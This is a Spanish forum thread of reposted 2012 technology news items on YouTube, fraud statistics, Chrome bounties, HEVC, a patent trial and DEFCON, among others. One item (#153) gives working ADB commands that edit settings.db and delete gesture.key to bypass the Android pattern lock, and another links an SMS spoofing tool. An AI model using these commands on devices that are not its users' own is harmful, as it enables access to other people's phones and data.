CitarHemos empezado el ajuste de la clasificación de los vídeos de YouTube en busca de premiar vídeos atractivos que mantienen a los espectadores mirando.

Según explican en el blog oficial de YouTube para socios y creadores, los resultados experimentales de este cambio han resultado positivos, y confían en que el tiempo dedicado por los usuarios a visualizar las obras aumente, tanto en los vídeos resultantes de una búsqueda, como por visita directa al portal. Se ha añadido ya en YouTube Analytics un informe sobre el tiempo de visualización para proporcionar a sus clientes una herramienta más de evaluación del rendimiento de sus vídeos y canales.

El sitio ya ha ajustado los algoritmos de descubrimiento, aquellos empleados para las recomendaciones, para centrarse en los que más tiempo capturan la atención del visitante y no por los clics recibidos. Ahora está haciendo lo mismo para las búsquedas.

La medida, que si bien hace justicia a la calidad de los contenidos, también beneficia a YouTube. Cuanto más tiempo estén los usuarios visualizando contenidos, mayores ingresos para el portal en concepto de publicidad. YouTube aloja millones de vídeos y cada día aumenta su número a un ritmo frenético. Como ya tiene cantidad, es buen momento para apostar por la calidad.

Fuente:
http://www.genbeta.com/multimedia/youtube-comienza-a-clasificar-los-videos-por-tiempo-de-visualizacion-y-no-por-visitas-recibidas
#144
l 2,3% de todas las transacciones basadas en máquinas Linux son fraudulentas, frente al 1,4% de Windows y el 1% de Mac, según un estudio de iovation.

Aunque no suele aparecer entre los primeros de la lista cuando se trata de infecciones por malware, un estudio elaborado por iovation, una compañía especializada en investigación de fraude, revela que Linux es la plataforma favorita de los defraudadores online.

Dicho estudio apoya sus conclusiones en el análisis de cerca de 1.000 millones de dispositivos.

"Curiosamente, nos hemos encontrados con que el 2,3% de todas las transacciones basadas en máquinas Linux, un 1,4% de todas las transacciones en máquinas Windows y el 1% de todas las transacciones desde Macs son fraudulentas", comenta Scott Waddell, vicepresidente de tecnología de esta firma con base en Portland.

"Como véis, no hay ninguna plataforma móvil en el top 3. Creemos que esto se debe a que los estafadores prefieren sistemas operativos que faciliten la automatización de sus sistemas", continúa explicando Waddell, tal y como recoge CreditUnionTimes.

Sin embargo, el directivo no ha ofrecido ninguna información adicional del motivo que posiciona a Linux como objetivo principal o soporte favorito de los cibercriminales para llevar a cabo sus fechorías, frente a otras plataformas de software.

Fuente:
http://www.siliconweek.es/noticias/los-defraudadores-online-prefieren-linux-27261
#145
La granja de la familia Kraay, situada en la región canadiense de Alberta, alberga el código QR más grande visto hasta la fecha, que ha sido desarrollado en un laberinto que ocupa una extensión de 15 acres, equivalente a alrededor de 28.000 metros.

El código QR ha sido diseñado gracias a la ayuda de un experto en laberintos y en la familia Kraay explican que tuvieron la idea después de leer una revista.

Básicamente, vieron un código QR en la portada de una revista y cayeron en la cuenta de que la forma de este se asemejaba a la de un laberinto y decidieron probar suerte.

Para empezar, tuvieron que acondicionar un campo de maíz cortando algunas partes e hicieron que el camino del laberinto tuviera un color más oscuro que el resto.

De esa forma el código QR podía ser reconocido por los dispositivos móviles y abría la página web oficial de la granja de los Kraay si era escaneado por cualquier usuario.

Los granjeros esperan que con ese código QR gigante, que ya está incluido en el Libro Guiness de los Récords, aumenten las visitas a su granja y también se beneficien los negocios de la zona.



Fuente:
http://www.theinquirer.es/2012/09/11/una-granja-canadiense-alberga-el-codigo-qr-mas-grande-del-mundo.html
#146


Los tres dominios son applanet.net, appbucket.net y snappzmarket.com, y según informó el Departamento de Justicia en un comunicado han quedado "bajo custodia del Gobierno federal".

Quienes visiten alguno de estos sitios encontrarán un letrero en el que se notifica que el dominio ha sido confiscado por las autoridades federales, que informan que la violación de los derechos de autor es un delito.

Esta es la primera vez que una web involucrada en el intercambio de aplicaciones móviles ha sido cerrada, según el Departamento de Justicia, que señaló que la operación ha sido posible gracias a la coordinación con las autoridades de Francia y Holanda.

El fiscal general adjunto de la División Criminal del Departamento de Justicia Lanny Breuer señaló que para su departamento es una "prioridad" tomar medidas contra la piratería incluyendo estos accesorios para el móvil.

Las aplicaciones de software se han convertido en una parte cada vez más importante de la "economía de nuestra nación y la cultura creativa", dijo Breuer, quien subrayó su compromiso de "proteger a los creadores de estas aplicaciones".

Fuente:
http://economia.elpais.com/economia/2012/08/22/agencias/1345615874_660247.html

En inglés:
http://www.bloomberg.com/news/2012-08-22/u-s-authorities-seize-three-mobile-app-websites.html
#147


La empresa suiza Logitech, especializada en teclados, ratones y webcams, ha desarrollado el Washable Keyboard K310, un nuevo teclado a prueba de liquidos que puede lavarse sin problemas.

Hablamos de un teclado que está especialmente pensado para evitar que quede inutilizable por culpa de restos de comida o el chorreo de agua u otras bebidas sobre su superficie.

El modelo K310 tiene la gran ventaja de puede sumergirse a una profundidad equivalente a 3,30 metros, lo que hace que su lavado en un fregadero se realice de forma sencilla.

Además, esta especialmente diseñado para un secado rápido, y la  calidad de las distintas letras y caracteres del teclado, que han sido impresas con un sistema láser y de protección ultravioleta, evita que se borren después de su lavado.

Desde Logitech, también explican que los hoyitos que presenta el teclado en su parte posterior constituyen una vía de escape para el agua y permiten acelerar el secado del aparato.

Por último, se indica que es compatible con Windows XP, Windows Vista y Windows 7 y llegará en octubre a España y Latinoamérica con un precio equivalente a los 39,99 dólares.


Fuente:
http://www.theinquirer.es/2012/08/22/logitech-presenta-un-teclado-que-se-puede-lavar.html

En Inglés:
http://www.techpowerup.com/170882/Logitech-Unveils-Washable-Ultra-Durable-Keyboard.html
#148
La Campus Party comenzó en Valencia en el año 2000 y, desde entonces, ha sido un evento indispensable cada año en la capital del Turia. Ocho ediciones después, el encuentro ha decidido traspasar fronteras y se celebra este año en Berlín. Así, Telefónica y Campus Party inauguraron ayer en la capital alemana el mayor encuentro tecnológico del planeta. La reunión, que tiene lugar en el aeropuerto de Tempelhof, pretende reunir a más de 10.000 jóvenes de toda Europa en un evento de notorio reconocimiento y el mayor en cuanto a tecnología, creatividad, ocio y cultura. Decenas de autobuses han salido desde las principales universidades europeas hacia este evento único en el que se reescribirá el código fuente europeo.

La cita finalizará el próximo 26 de agosto y hasta entonces la actividad será frenética. Así, durante la semana, los campuseros podrán participar en distintos talleres en 24 zonas temáticas, en las que tendrán lugar más de 400 horas de contenidos y actividades. En ellas participarán personalidades como Paulo Coelho.


Fuente:
http://www.abc.es/20120822/comunidad-valencia/abcp-campus-party-arranca-berlin-20120822.html
#149



Ya sabes que contar con acceso a internet mediante WiFi se está convirtiendo en algo tan necesario como el agua, y parece que algunos están dispuestos a adoptar decisiones drásticas para poder proporcionarlo. Así, cuando ya creías haberlo visto todo, atentos a la medida que han adoptado en el parque temático relacionado con la historia Kfar Kedem ubicado en Israel y que ahonda en épocas pasadas, pero con un interesante vínculo con nuestros tiempos: sus usuarios contarán con acceso a internet y éste llegará a través de... burros.

Como lo lees. Por el momento, cinco de los treinta burros que campan a sus anchas por el parque harán de hotspots ambulantes, aunque el gerente del parque, Menachem Goldberg, asegura que espera ampliar la 'flota' al resto de pollinos a mayor gloria de los visitantes. Ya sabes, todo vale para contar con un buen acceso a la red...

[Vía Fast Company]
http://www.fastcompany.com/3000575/giddy-app-ride-wi-fi-equipped-donkeys-biblical-theme-park

Fuente:
http://es.engadget.com/2012/08/21/parque-tematico-israel-wifi-burros/
#150


Algunos ya nos hemos mudado por completo a las conexiones inalámbricas y por lo tanto las mejoras en redes Ethernet poco o nada nos importan, pero este tipo de cableado sigue siendo fundamental para las personas que necesitan transmitir datos en grandes cantidades y para las empresas que buscan absoluta fiabilidad. Por eso la organización a cargo de los estándares, la IEEE, ha convocado a una reunión en Ginebra a finales de septiembre para tomar decisiones con respecto a los detalles técnicos de la nueva generación de Ethernet.

Durante el importante evento, el grupo a cargo, llamado "Higher-Speed Ethernet Consensus", discutirá primordialmente dos tecnologías de Ethernet, una que permite transmitir datos a 400 Gbps y otra a 1 Tbps. A simple vista escogeríamos la más rápida sin hacer preguntas, pero resulta que ambas tienen sus pros y sus contras, porque consiguen esas velocidades combinando varias conexiones, y los precios de implementación son un detalle muy importante a tomar en cuenta.

Se espera que la adopción del nuevo Ethernet empiece pocos meses después de la reunión de septiembre, pero eso no quiere decir que puedas planificar la instalación de una red de 1 Tbps en tu casa para el próximo año, porque primero tienen que probar con el máximo esmero la tecnología y asegurarse de que los videos de gatos publicados en YouTube de verdad puedan transmitirse sin complicaciones.

[Foto cortesía de Justin Marty, Flickr]
[Vía CNET y The Verge]
http://news.cnet.com/8301-1023_3-57495639-93/ethernets-future-how-fast-is-fast-enough/?part=rss

Fuente:
http://es.engadget.com/2012/08/20/ieee-estandar-ethernet/
#151
La página en internet del tribunal ruso que condenó a dos años de campo a tres integrantes del grupo Pussy Riot por una "oración punk" anti-Putin ha sido blanco de un ciberataque el martes durante unas horas, informó a AFP una portavoz de la institución judicial.

La página del tribunal Khamovnitcheski de Moscú "ha sido blanco de un ciberataque", declaró a AFP la portavoz Daria Liakh.

En la web del tribunal se podían ver el martes por la mañana un vídeo provocador del cantante homosexual búlgaro Azis, unas imágenes que se burlan del sistema judicial ruso, al igual que una nueva canción del grupo Pussy Riot titulada 'Putin lights up the fires' - 'Putin incendia'-, observó una periodista de AFP.

En la página de acogida figuraban también unas consignas como "la práctica judicial - no puede ser peor" o "¡la pandilla de ladrones de Putin saquea el país! ¡Despierten, camaradas!".

Por otra parte, se podía ver un número de teléfono y las palabra "Pregunta a Jenia (diminutivo el nombre ruso Evgueni)".

El hombre que respondió a este número se presentó como el bloguero Evgueni Volnov y afirmó no estar al tanto de quien estaba detrás de este ciberataque.

Sin embargo dio a entender que sus organizadores deseaban así mostrar su apoyo a las tres jóvenes de las Pussy Riot -Nadejda Tolokonikova, de 22 años, Yekaterina Samutsevich, de 30 años, y Maria Alejina, de 24 años- condenadas el viernes por "vandalismo" e "incitación al odio religioso" a dos años de campo por este tribunal.

"La reacción de los hackers es comprensibles", declaró este bloguero a AFP.

Hacia las 06H30 GMT, el funcionamiento de la web del tribunal se restableció, observó AFP.

El juicio de las Pussy Riot, condenadas por haber cantado en febrero una "oración punk" anti-Putin en una catedral de Moscú, alcanzó una dimensión internacional y la sentencia ha sido muy criticada en el extranjero donde fue calificada de "desproporcionada".

© 2012 AFP

Fuente:
http://es.kioskea.net/news/15142-pirateada-la-pagina-web-del-tribunal-ruso-que-condeno-a-las-pussy-riot
#152


Un investigador ha descubierto un error grave en la herramienta de mensajes de texto de los teléfonos intekigentes de Apple iPhone que permite suplantación de identidad y ataques phishing mediante ingeniería social.

El investigador y experto en jailbreak indica que el bug está presente desde el iPhone original hasta la última versión del sistema operativo publicada, la beta 4 de iOS 6.0, base para la próxima versión final de iOS 6.0.

El problema radica en la forma en que el iOS de Apple implementa una sección de los mensaje SMS del usuario User Data Header (UDH) que tiene un número de opciones, una de las cuales permite al usuario cambiar el número de teléfono de dónde parece provenir el mensaje. Un número especial como el 112, el del banco de la víctima o el de uno de sus contactos. Ello permitiría a un atacante suplantar la identidad e intentar estafas cibernéticas.

Apple ha respondido confirmando el bug como "una de las limitaciones de los mensajes de texto que permite que los mensajes sean enviados con direcciones falsas a cualquier teléfono" recomendado el uso de iMessage en su lugar "ya que las direcciones son verificadas protegiendo de este tipo de ataques de suplantación de identidad".

Fuente:
http://muyseguridad.net/2012/08/19/grave-vulnerabilidad-aplicacion-sms-iphones/

Original:
http://www.pod2g.org/2012/08/never-trust-sms-ios-text-spoofing.html

iPhone SMS spoofing tool released
http://www.reddit.com/tb/yk5cv
#153


Muchos de nosotros bloqueamos nuestro teléfono con el característico sistema de patrón de seguridad de Android. Siempre se ha caracterizado como un buen método para proteger tu teléfono de las miradas indiscretas y que aporta una buena seguridad en general. Pero como siempre he dicho, si alguien quiere entrar en tu teléfono, lo hará. Con patrón o sin.

En esta ocasión un usuario de XDA (m.sabra) acaba de descubrir un méotodo muy sencillo que nos va a permitir saltarnos el patrón de seguridad de cualquier teléfono Android sin necesidad de ser root. Tan solo hace falta dos cosas

    Saber utilizar el ADB (¿he oído drivers bien instalados?)
    Tener el modo depuración activado

Los métodos para saltarse el patrón de desbloqueo son los siguientes
Método 1

En una consola mediante ADB introducimos las siguientes órdenes

    adb shell
    cd /data/data/com.android.providers.settings/databases
    sqlite3 settings.db
    update system set value=0 where name='lock_pattern_autolock';
    update system set value=0 where name='lockscreen.lockedoutpermanently';
    .quit


Método 2

Mucho más sencillo. En esta ocasión tan solo hemos de ejecutar lo siguiente

adb shell rm /data/system/gesture.key

[youtube=425,350]http://youtu.be/tVJ7T2oC_Zs[/youtube]

m.sabra nos recomienda realizar la siguiente rutina

    Método 1
    Reiniciar
    Método 2
    Reiniciar

Al hacer todo esto, puede que te siga pediendo el patrón de desbloqueo pero tal y como se muestra en el vídeo,  puedes pulsar cualquier cosa.
Conclusiones

De este hecho se han de sacar varias conclusiones

    Por mucho patrón de seguridad, código pin o lo que sea, si alguien que sabe de móviles te roba el teléfono podrá saltárselo todo. No hay un sistema de protección definitivo
    Más vale tener desactivado el modo depuración cuando no lo necesites. Si no lo tienes activado este método no sirve.
    Este método puede ser una buena solución para toda la gente que pone un patrón de seguridad y luego se olvida de él.

Espero que os haya parecido interesante. Yo desde luego me lo apunto para el futuro.

Fuente:
http://www.elandroidelibre.com/2012/08/como-saltarse-el-patron-de-seguridad-de-android.html
#154
Si habéis subido vídeos a YouTube en alguna ocasión (o cualquier tipo de contenido en algún servicio) sabréis que una forma de clasificar esos vídeos e indexarlos para facilitar las búsquedas son las etiquetas o tags. Es un método de catalogación muy extendido a todo tipo de material, incluyendo las mismas entradas de Genbeta y del resto de publicaciones de Weblogs SL. Pues bien, YouTube ha ocultado las etiquetas de todos los vídeos del servicio impidiendo que los usuarios puedan ver qué etiquetas lleva cada vídeo.

Al parecer muchos usuarios exageran demasiado al colocar etiquetas en sus vídeos con la esperanza de que su material destaque más en las búsquedas; hasta el punto en el que colocan océanos interminables de etiquetas en campos ajenos como la descripción del vídeo copiando las etiquetas de vídeos parecidos indiscriminadamente. No es el modo adecuado de usar las etiquetas, confunde a los navegantes y se puede considerar tentativa de SPAM en según qué casos.

Así que YouTube ha decidido ocultar todas las etiquetas para que los usuarios no abusen de su uso: si nadie sabe qué etiquetas tiene un vídeo, nadie podrá copiarse. No es la solución definitiva, pero es algo. Las etiquetas siguen existiendo y de hecho YouTube sigue pidiendo que las escribamos al subir un vídeo, lo único que nadie las podrá ver públicamente y quedarán ocultas para que YouTube las pueda usar de forma interna.

Fuente:
http://www.genbeta.com/web/youtube-oculta-las-etiquetas-de-todos-sus-videos-para-evitar-las-malas-practicas-de-los-usuarios
#155




    Es la segunda vez que convoca un encuentro como éste en lo que va de año.
    Google ofrece hasta 60.000 dólares (48.572 euros) a aquellos que consigan trastocar el código de su navegador, entre otras categorías.
    El gigante de las búsquedas quiere evitar los ataques que ya se manifestaron en la última versión estable de Chrome.



Google ha convocado un encuentro orientado a que los 'hackers' ayuden a mejorar la seguridad de su navegador. La compañía repartirá 2 millones de dólares en premios a los programadores que alerten sobre fallos en Chrome.

Es la segunda vez en lo que va de año que Google convoca este conferencia, llamada Pwnium, en la que anima a los mejores 'hackers' de todo el mundo a desafiar sus barreras de seguridad. El encuentro tendrá lugar en Kuala Lumpur (Malasia) el próximo 10 de octubre.

Los asistentes podrán competir en diferentes categorías. Google ofrece hasta 60.000 dólares (48.572 euros) a aquellos que consigan trastocar el código de su navegador, 50.000 dólares (40.476 euros) para los que sean capaces de encontrar errores en el navegador y 40.000 dólares (32.376 euros) si se detectan errores ajenos que puedan afectar a su navegador.

Chrome fue el navegador más utilizado en julio con una cuota superior al 33%

Hace una semana llegaba la noticia de que el navegador de Google alcanzaba una cuota de mercado del 33,81% y se convertía así en el navegador más utilizado durante el mes de julio.

El gigante de las búsquedas quiere evitar los ataques que ya se manifestaron en la última versión estable de Chrome y se muestra satisfecho con el trabajo que los 'hackers' han realizado en ocasiones anteriores. Por esta razón, Google ha aumentado la cantidad de los premios y ha convocado esta segunda edición de su conferencia Pwnium.

Fuente:
http://www.20minutos.es/noticia/1566060/0/google/dos-millones/hackers/
#156
Es posible que al utilizar un dispositivo móvil o tablet Android hayas observado que en la zona superior desplegable, la barra de notificaciones, aparecen cada cierto tiempo unos mensajes publicitarios junto a un icono que no sabes exactamente de donde han salido.





1. ¿Qué son?

No son más que una «nueva» modalidad de publicidad (eso sí, muy molesta e intrusiva) que va mostrando anuncios cada cierto tiempo en la barra de notificaciones.

Es equivalente a los clásicos banners que aparecen en la zona superior o inferior de las aplicaciones, sólo que sigue un esquema diferente.

2. ¿De dónde salen?

Te preguntarás de donde vienen estos anuncios y porque están apareciendo, si durante mucho tiempo no habías visto en tu dispositivo nada similar.

Estos anuncios se muestran porque alguna de las apps instaladas está ordenando a tu móvil que obtenga estos anuncios y los muestre cada cierto tiempo.
3. ¿Por qué las apps incluyen esto?

Las apps tienen este sistema (llamado Airpush, debido a la empresa que lo popularizó) porque su programador decidió comenzar a mostrar estos anuncios a los usuarios de su aplicación.

Incorporar anuncios publicitarios en las aplicaciones de Android no es algo malo. Por un lado, permite al programador recibir ingresos publicitarios a cambio de mostrar publicidad.

Por otro lado, facilita que muchas apps sean gratuitas (con publicidad) y no aplicaciones de pago, por lo que el usuario no tiene que pagar por usarla.

4. ¿Cómo hago que no aparezca más?

El eterno dilema. Aunque existen sistemas para invalidar la publicidad y seguir utilizando el programa (necesita ser root), nosotros vamos a seguir la vía de la razón y la ética.

En principio, cualquier programador es libre de incorporar la publicidad que quiera en su aplicación. Obviamente, cualquier usuario también será libre de dejar de utilizar la aplicación (y/o buscar otra app alternativa) si considera que la publicidad es demasiado molesta.

Método 1: Airpush Detector

Nuestra primera misión será averiguar que apps instaladas son las que están mostrando estos molestos banners en la barra de notificaciones. Para ello utilizaremos Airpush Detector, que es muy sencillo y efectivo:

Basta con abrir la aplicación e instantáneamente comenzará a examinar las apps instaladas y mostrará una lista de las aplicaciones con capacidad para mostrar publicidad en la barra de notificaciones.

Ahora será cosa nuestra decidir si las aplicaciones son lo suficientemente prescindibles como para desinstalarlas. En caso afirmativo, pulsamos sobre la app y nos olvidamos de ella.

Existen varias aplicaciones para detectar publicidad indeseada, similares a Airpush Detector, como por ejemplo Airblocker, TrustGo Detector, Advertising Detector o Addons detector.

Método 2: AppBrain Ad Detector

Puede ocurrir que el Airpush Detector no nos muestre ninguna app en la lista, y aún así sigamos recibiendo publicidad en la barra de notificaciones.

Si es así, utilizaremos AppBrain Ad Detector, una aplicación que nos mostrará un resumen de las apps instaladas (e incluso monitorizar las que vamos instalando) revelando datos interesantes sobre las apps.

En la parte derecha del listado de apps, nos aparecerá un color (rojo, naranja, verde...) que indicará la peligrosidad de los permisos de la aplicación.

Además, podemos examinar cada aplicación y ver que clase de permisos pide (con su gravedad), las redes publicitarias que utiliza, etc...

OJO: Que una aplicación aparezca en rojo no significa que sea maligna, si no que utiliza permisos delicados y que hay que confiar bastante en ella.

Método 3: Lookout Ad Network Detector

Un tercer método, si los anteriores se nos resisten, es instalar el Lookout Ad Network Detector, que muestra las aplicaciones según las distintas acciones que es capaz de realizar:

    Mostrar anuncios en la barra de notificaciones.
    Modificar la página de inicio del navegador o añadir favoritos.
    Añadir iconos al escritorio del launcher.
    Realizar llamadas, SMS o cámara.
    Recopilar información personal.
    Recopilar información de localización.
    Recopilar información de dispositivo u operadora.
    Reemplazar tono de llamada con publicidad.

Es una aplicación ideal para los paranóicos de la privacidad, que podrán tener controlado que tipo de información se comparte, desde que red publicitaria y con que aplicación.

Método 4: El Sysadmin ataca de nuevo

Si los anteriores métodos no han funcionado, queda una última posibilidad de detectar la app que está mostrando los anuncios. Se trata de utilizar dos aplicaciones: CatLog y OS Monitor.

La primera es un visor del logcat (registro de logs) del dispositivo. En él se refleja cualquier operación que se lleve a cabo en nuestro terminal. Una vez nos aparezca el anuncio en la barra de notificaciones, abrimos el CatLog y guardamos el registro actual en un fichero de texto.

En este registro podremos buscar el texto del anuncio y extraer el PID (un número que identifica la aplicación que ha creado el anuncio).

Una vez tengamos ese PID, sólo tenemos que acceder al OS Monitor, un monitorizador de procesos activos, y buscar en la lista de apps, la que coincide con el PID encontrado anteriormente.

Y esto es todo. ¿Has conseguido eliminar los anuncios de la barra de notificaciones? ¿Conoces alguna app no listada en el artículo digna de mención? Puedes compartirla en los comentarios, si lo deseas.

Fuente:
http://www.emezeta.com/articulos/publicidad-en-las-notificaciones-de-android
#157
Santoku es una distribución Linux basada en OWASP's MobiSec especializada en pruebas de seguridad, análisis de malware y análisis forenses para teléfonos móviles, válida para dispositivos con Android, BlackBerry, iOS y Windows Phone. 

La versión Santoku Community Edition es un proyecto colaborativo para proveer un entorno Linux preconfigurado con utilidades, drivers y guías para este campo. La versión alpha puede ya descargarse:

Descarga (+3Gb): Santoku-0.1-alpha.iso
md5:54e48ea0cd133da04a1b55d4531e35bb

E incluye las siguientes herramientas:

Herramientas de desarrollo:

    Android SDK Manager
    Apple Xcode IDE
    BlackBerry JDE
    BlackBerry Tablet OS SDK
    BlackBerry WebWorks
    DroidBox
    Eclipse IDE
    Windows Phone SDK
    Android 2.3.3, 3.2, and 4.0.3 Emulators
    SecurityCompass Lab Server (HTTP and HTTPS)
    BlackBerry Ripple
    BlackBerry Simulators

Penetration Testing:

    CeWL
    DirBuster
    Fierce
    Nikto
    nmap
    Burp Suite
    Mallory
    w3af Console
    w3af GUI
    ZAP
    BeEF
    Ettercap
    iSniff
    Metasploit Console
    Metasploit GUI
    NetSed
    SET
    SQLMap
    SSLStrip

Ingeniería inversa:

    APK Tool
    Dex2Jar
    Flawfinder
    Java Decompiler
    Strace

Analizadores wireless:

    Aircrack-ng
    Kismet
    Ubertooth Kismet
    Ubertooth Spectrum Analyzer
    Wireshark

Forense de dispositivos:

    AFLogical Open Source Edition
    Android Encryption Brute Force
    BitPim
    BlackBerry Desktop Manager
    Foremost
    iPhone Backup Analyzer
    MIAT
    Paraben Device Seizure
    Sift Workstation
    Sleuth Kit
    SQLiteSpy

Infraestructura móvil:

    BES Express
    Google Mobile Management
    iPhone Configuration Tool



Fuente:
http://www.hackplayers.com/2012/08/santoku-distribucion-de-seguridad-moviles.html
#158
El grupo MPEG (o Moving Picture Experts Group, por si os queréis aprender las siglas) ha anunciado hoy la existencia de un nuevo formato de vídeo bautizado como High Efficiency Video Coding o HEVC, también conocido como H.265. Estas últimas siglas os pueden sonar, ya que uno de los formatos de vídeo más usados actualmente es el H.264.

Lo especial de este nuevo formato es que es capaz de doblar la eficiencia del formato H.264. Es decir, puede reproducir vídeo a la misma calidad que H.264 pero sólo necesita la mitad del ancho de banda. A los usuarios les supone un ahorro de espacio notable, y ya no hace falta ni entrar en materia cuando pensamos en un YouTube que podría consumir la mitad del ancho de banda que consume ahora mismo.

El formato podría empezar a ser usable el año que viene como estándar, y los responsables apuestan porque la adopción empezará por los dispositivos móviles (gracias a que son capaces de adoptar nuevos formatos más rápidamente). El interés por las empresas, sólo por el hecho de un ahorro de la mitad del tráfico que gastan, es evidente.

Fuente:
http://www.genbeta.com/multimedia/el-grupo-mpeg-anuncia-el-formato-hevc-posible-sucesor-del-h-264
#159
Una jueza estadounidense instó el miércoles a los jefes de Apple y Samsung a negociar una tregua en el publicitado juicio de patentes que los enfrenta en el corazón del Silicon Valley, diciendo a ambos gigantes de la electrónica que "es hora de la paz".

La jueza de Distrito Federal en San José, California (oeste), Lucy Koh, pidió a los jefes de Apple y Samsung hablar por teléfono para llegar a un acuerdo legal antes de que el caso sea puesto en manos de los miembros del jurado, probablemente a finales de la próxima semana.

"Veo riesgos aquí para ambas partes, creo que por lo menos vale la pena una oportunidad más", dijo Koh, al tiempo que pidió al jefe de la estadounidense Apple, Tim Cook, y al de la surcoreana Samsung, Kwon Oh-Hyun, ponerse en contacto para poner fin a la disputa.

"Si lo que ustedes querían era crear conciencia de que tienen la propiedad intelectual de esos dispositivos, el mensaje está claro", continuó.

"En muchos sentidos, el mensaje está claro. Es hora de la paz".

En mayo, dos días de conversaciones de paz, a instancias de la corte, entre Cook y el entonces jefe de Samsung, Choi Gee-Sung, fueron infructuosos, allanando el camino para el juicio iniciado el 30 de julio en California.

Kwon asumió al frente de la empresa de tecnología más grande del mundo en junio después de que su predecesor, Choi Gee-Sung, fuera nombrado jefe de la oficina de estrategia del grupo Samsung, del cual la firma electrónica es el buque insignia.

Apple y Samsung se acusan mutuamente de violar la tecnología patentada de sus teléfonos inteligentes y tabletas, por lo que libran batallas similares ante la justicia de varios países.

"Si ustedes buscaban alguna valoración de la propiedad intelectual... creo que ya la han recibido de los tribunales de todo el mundo", dijo Koh a Apple y Samsung, que acordaron que sus respectivos jefes hablen por teléfono.

Apple acusa a Samsung de copiar descaradamente las características de iPads y iPhones para competir con dispositivos equipados con el Android de Google, y reclama por esto más de 2.500 millones de dólares.

Samsung niega rotundamente las acusaciones y busca probar que es Apple la que ha infringido sus patentes.

© 2012 AFP

Fuente:
http://es.kioskea.net/news/15125-jueza-insta-a-jefes-de-apple-y-samsung-a-negociar-una-tregua-por-patentes
#160
Desde el blog Office de Microsoft, afirman que en la próxima versión de Microsoft Word quieren dar el salto que algunos usuarios echaban en falta desde versiones anteriores del paquete de ofimática, para poder convertir archivos PDF en archivos Word. El objetivo del gigante esta vez, sería permitir al usuario convertir archivos PDF en archivos Word editables a través del mismo programa desbloqueando el archivo. Todo éste cambio será gracias a una nueva característica que se incluiría en Word llamada PDF Reflow (reflujo PDF). Conoce más detalles a continuación.

Parece ser que Microsoft, comienza a tener en cuenta las quejas de los usuarios ya decepcionados por la dificultad que tiene ya de por si editar los archivos PDF en Word.

El gigante ahora quiere que la próxima versión de Microsoft Word (Word 2013) permita a los usuarios que tengan el programa, editar archivos PDF desde el mismo Word y sin un programa de terceros como podría ser Free PDF To Word Converter.

Esta nueva característica a la que le ha llamado PDF Reflow (reflujo PDF) vendría ya activada y disponible en su próxima versión del paquete de ofimática: Microsoft Word 2013.

¿Cómo funciona esta nueva característica?

Como ya sabemos, el formato PDF es un formato único y fijo, lo que significa que los almacenes de archivos en imágenes de texto y de gráficos, se colocan en una misma página (pero no necesariamente se relacionan entre ellos).

El objetivo de PDF Reflow sería abrir una puerta a una edición fácil del archivo reutilizando a la vez todo el contenido del archivo.

La función de PDF Reflow sería en éste caso trabajar a través y desde un conjunto específico de reglas, para convertir el diseño del archivo en PDF en un unico documento Word.

El ejemplo gráfico sería el siguiente:



Microsoft también afirma que ésta característica no está destinada a reemplazar el lector PDF que traerá incorporado Windows 8, sino que será un complemento aparte e incluido en Word 2013, además será un conversor que le dará un nuevo nivel de acceso a todo su contenido.

El gigante añade:

    "Funciona con cualquier archivo PDF, además los resultados son mejores con los documentos que se encuentran en modo textual, tales como los documentos legales y de negocios. Si un archivo en PDF contiene en su mayoría imágenes y diagramas como en una presentación o un folleto, la conversión tiene una probabilidad mucho mayor de problemas.."

La nueva característica llamada PDF Reflow permitirá convertir archivos PDF en documentos Word editables. Pero quizás lo mejor de ésta nueva característica según Microsoft, es que conservará el diseño original (también al editar y al leer).

Otro ejemplo gráfico de PDF Reflow es el siguiente:



Como vemos, la nueva característica crea una copia editable del documento (ya pasada a Word) y de su contenido. Además si los resultados no son los deseados por nosotros, el archivo PDF original se mantiene intacto y tal como lo teníamos al principio.

Fuente:
http://www.softzone.es/2012/08/11/microsoft-planea-poder-convertir-los-archivos-pdf-en-documentos-word-editables-en-word-2013/

En inglés:
http://blogs.office.com/b/microsoft-word/archive/2012/08/09/unlock-pdfs-with-the-new-word.aspx
#161
La DEFCON, o DEF Con o Defcon – como más os guste – es una de las convenciones de hackers más antiguas y conocidas que existen, se celebra cada verano en Las Vegas y este año ha cumplido su vigésimo aniversario. La primera convención se realizó en junio de 1993 y desde entonces, cada año, hackers de todo el mundo se reúnen en la ciudad del pecado para hablar sobre programación, seguridad y ordenadores. Lo que empezó como una pequeña reunión a principios de la década de los noventa se ha convertido en un evento de cuatro días que congrega a más de 15.000 personas. Los responsables de la DEFCON han querido hacer algo especial por el aniversario así que han contratado al historiador tecnológico y documentalista Jason Scott (Get Lamp, BBS: The Documentary) para que realice un documental sobre la convención.



Scott, quien ha participado de manera intermitente en la DEFCON durante los últimos doce años, se muestra entusiasmado con el proyecto. Este historiador tecnológico lleva más de 25 años relacionado con los ordenadores y tiene bastante credibilidad a la hora de hablar sobre los hackers; se le respeta como observador ya que ha pasado muchos años entrevistando y conociendo a profesionales y amantes de la informática mientras seguía la evolución de la piratería, los ordenadores e Internet. Es una idea muy acertada que él sea el director del documental, su trayectoria profesional y laboral lo convierten en la persona indicada para el trabajo. Scott es muy consciente de ello:

    [...] fui elegido por la DEFCON para hacer este documental porque, en cierto modo, soy parte de la cultura, un DEFCON regular...

El trabajo de Scott busca ir más allá de la grabación del evento en sí, sabe que será una pesadilla logística porque tendrá que hacer un amplio y exhaustivo trabajo de investigación, hacer muchas llamadas, muchos envíos, trabajar con muchas imágenes y sonidos de archivo pero es la única manera de reflejar todo el espectro humano de la convención. Él sabe que la gente que asiste a Las Vegas cada año es única: individualistas, líderes, anarquistas, protegidos, creativos. En el fondo se trata de un grupo bastante cerrado con una dinámica más que particular, la tensión es palpable y esa amalgama de sentimientos encontrados, de rivalidades, de burlas, de ambiciones es algo que Scott espera poder captar con su documental.

[youtube=425,350]http://youtu.be/dw_cgRy94YY[/youtube]

Fuente:
http://alt1040.com/2012/08/se-prepara-un-documental-sobre-la-convecion-hacker-defcon
#162
Dos años de cárcel has sido la pena de la sentencia dictada por la Audiencia Provincial de Valencia a un hombre por espiar el correo de su ex-novia, así como por hacer un uso no autorizado del mismo, como por ejemplo el envío de información privada de la víctima.

En concreto, el acusado y condenado reenvió información sobre conversaciones privadas de otras amistades sobre relaciones sexuales a listas de contactos de la victima, además de cambiarle la contraseña.

La victima aseguró en el juicio que esta conducta le provocó ansiedad, desórdenes gástricos y otros trastornos transitorios.

La pena ha sido bajo el delito de revelación de secretos y vejaciones.

Fuente:
